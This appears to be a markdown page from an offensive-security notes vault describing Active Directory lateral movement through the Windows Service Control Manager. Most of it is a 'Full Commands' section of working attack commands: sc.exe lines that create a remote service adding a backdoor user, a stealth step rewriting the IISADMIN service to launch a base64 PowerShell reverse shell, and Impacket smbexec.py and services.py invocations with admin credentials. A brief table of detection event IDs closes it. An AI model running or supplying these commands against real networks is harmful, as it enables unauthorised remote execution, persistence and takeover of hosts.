attack-59-scm-service-manager-lateral-movement.md (2685B)
1 --- 2 title: "Attack #59 — SCM Service Manager Lateral Movement" 3 description: "The Service Control Manager (SCM) allows remote service creation and management via named pipes (\\pipe\\svcctl). An attacker with admin credentials can…" 4 category: active-directory 5 subcategory: "Lateral Movement" 6 tags: ["active-directory", "lateral-movement"] 7 tools: ["Impacket", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Seven/⚫ Attack #59 — SCM Service Manager Lateral Movement.md" 11 --- 12 # ⚫ Attack #59 — SCM / Service Manager Lateral Movement 13 14 *** 15 16 ## 📖 How It Works 17 18 The Service Control Manager (SCM) allows remote service creation and management via named pipes (`\pipe\svcctl`). An attacker with admin credentials can **create a Windows service** on a remote host that executes arbitrary commands as SYSTEM. This is essentially what `sc.exe` and `smbexec.py` use under the hood. 19 20 *** 21 22 ## ⚙️ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Local admin on target** | Required for SCM access | 27 | **SMB access (port 445)** | SCM operates over named pipes via SMB | 28 29 *** 30 31 ## 💻 Full Commands 32 33 ```powershell 34 # ── Create remote service ───────────────────────────────────────────────────── 35 sc.exe \\TARGET create remotesvc binPath= "cmd.exe /c net user hacker P@ss! /add" 36 sc.exe \\TARGET start remotesvc 37 sc.exe \\TARGET delete remotesvc 38 39 # ── Modify existing service for stealth ─────────────────────────────────────── 40 sc.exe \\TARGET config IISADMIN binPath= "cmd.exe /c powershell -e <base64_reverse_shell>" 41 sc.exe \\TARGET stop IISADMIN 42 sc.exe \\TARGET start IISADMIN 43 ``` 44 45 ```bash 46 # ── Impacket smbexec.py (service-based, no binary on disk) ─────────────────── 47 smbexec.py corp.local/Administrator:'Password1'@10.10.10.10 48 49 # ── services.py (direct service creation) ───────────────────────────────────── 50 services.py corp.local/Administrator:'Password1'@10.10.10.10 create -name evilsvc \ 51 -display "Evil" -path "cmd.exe /c whoami > C:\Temp\out.txt" 52 services.py corp.local/Administrator:'Password1'@10.10.10.10 start -name evilsvc 53 ``` 54 55 *** 56 57 ## 🛡️ Detection — Event IDs 58 59 | Event ID | Source | What to Look For | 60 |---|---|---| 61 | **7045** | System Log | New service installed remotely | 62 | **4697** | Security Log | Service installation | 63 64 *** 65 66 > ✅ **Attack #59 — SCM Lateral Movement complete.**